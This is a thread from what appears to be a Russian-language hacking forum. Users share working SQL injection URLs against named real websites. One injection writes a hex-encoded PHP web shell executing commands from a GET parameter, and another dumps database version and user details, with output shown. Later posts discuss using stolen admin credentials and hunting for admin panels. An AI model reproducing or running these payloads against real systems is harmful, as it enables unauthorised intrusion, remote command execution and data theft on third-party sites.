чё то я не могу понять а вывод, то есть команды? вот чё то я пеопробовал и файло у меня не перечиталось
LokbatanLi!как то ты по извращенному льешь шелл Вот! http://www.georgica.net/temp/1.php?id=ls вывод в файл работает! http://www.georgica.net/analitic/?page=ru&id=-303'+UNION+SELECT+0x3C3F206563686F20223C7072653E223B6563686F2073797374656D28245F4745545B226964225D293B6563686F20223C2F7072653E22203F3E,2,3,4,5,6,7,8+FROM+mysql.user+INTO+DUMPFILE+'/home/www/htdocs/temp/1.php'+--+ все норм
Вот шелл http://www.georgica.net/temp/1.php?id=ls <------в id комманды передаешь!! а не инклюдишь! тама код system($_GET["id"]); прописан! и ты могешь мля не писать транслитом!!!!!!!!!!!
Подскажите плиз. http://met-con.com/images/?w=700&src=/images/properties/dump%20oct%2019%202009%20110.jpg там есть читалка?
скуля есть PHP: http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(),0x40,user()),3,4,5--+ 5.0.89-community@metcon_web@metcon_webuser@localhost
Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним? На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то? У кого есть ссылка на какую-то статью на эту тему напишите.
Шелл пока немного не то. Хотя смотря каким макаром ты достал логин и пасс. Попробуй поискать админку. www.site.ru/admin или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
